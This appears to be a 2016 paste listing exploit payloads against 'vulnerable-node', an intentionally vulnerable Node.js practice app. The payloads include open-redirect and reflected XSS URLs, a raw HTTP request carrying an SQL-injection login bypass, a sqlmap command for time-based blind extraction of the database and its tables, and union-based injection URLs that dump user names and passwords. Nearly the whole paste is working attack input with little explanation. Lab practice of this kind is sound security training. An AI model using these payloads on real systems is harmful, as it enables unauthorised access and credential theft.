Untitled
a guest
Sep 21st, 2016
https://github.com/cr0hn/vulnerable-node

* Open Redirect:
http://172.17.0.1:3000/login?returnurl=//google.com

* XSS:
http://172.17.0.1:3000/login?returnurl=/%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E%3C
http://172.17.0.1:3000/login?returnurl=//google.com&error=%3CIMG%20SRC=X%20ONERROR=%22alert(/XSS/)%22%3E
http://172.17.0.1:3000/products/search?q=%3Cimg+src%3Dx+onerror%3Dalert(/xss/)%3E

* SQL Injection (auth bypass):
POST /login/auth HTTP/1.1
Host: 172.17.0.1:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.0.1:3000/login?returnurl=&error=No%20data%20returned%20from%20the%20query.
Cookie: connect.sid=s%3ApyGpstoiNO2ClZ4dVErSZzTRia-2fkt8.6rfooOeqIEQpbsIj7QQWmuCTbcymiwrndPUkwrpTnig
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

username=admin&password=qwerty%27+or+%271%27%3D%271%27+limit+1+--+x&returnurl=

* Time Based SQL Injection (auth; database dump):
We take it further with sqlmap; the following command extracts the database name, the current user and all tables:
~/soft/sqlmap/sqlmap.py -r nodejs-vuln.txt --techniq T --current-user --current-db --tables

Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=admin&password=' AND 2583=(SELECT 2583 FROM PG_SLEEP(5)) AND 'owAo'='owAo&returnurl=

nodejs-vuln.txt:
POST /login/auth HTTP/1.1
Host: 172.17.0.1:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.0.1:3000/login?returnurl=&error=No%20data%20returned%20from%20the%20query.
Cookie: connect.sid=s%3ApyGpstoiNO2ClZ4dVErSZzTRia-2fkt8.6rfooOeqIEQpbsIj7QQWmuCTbcymiwrndPUkwrpTnig
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

username=admin&password=*&returnurl=

* SQL Injection (union based; product detector style):
http://172.17.0.1:3000/products/detail?id=1%27%20and%20%273018%27%3d%273018
http://172.17.0.1:3000/products/detail?id=1%27%20or%20%273018%27%3d%273018%27%20limit%201%20--%20x
http://172.17.0.1:3000/products/detail?id=1' or '3018'='3018' limit 1 -- x

Burp SQL detector style:
http://172.17.0.1:3000/products/detail?id=1' and '3018'='3018
http://172.17.0.1:3000/products/detail?id=1' and '3018'='3019

http://172.17.0.1:3000/products/detail?id=1423123%27%20union%20select%20%271%27,%272%27,%273%27,%274%27,%275%27%20from%20users%20limit%201%20--%20x
http://172.17.0.1:3000/products/detail?id=1423123%27%20union%20select%20%271%27,name,password,%274%27,%275%27%20from%20users%20limit%201%20--%20x
http://172.17.0.1:3000/products/detail?id=1423123' union select '1',name,password,'4','5' from users limit 1 -- x

SQL Injection:
http://172.17.0.1:3000/products/search?q=%27%20and%201=2%20--%20x
http://172.17.0.1:3000/products/search?q=' and 1=2 -- x
http://172.17.0.1:3000/products/search?q=' and 1=1 -- x

* CSRF everywhere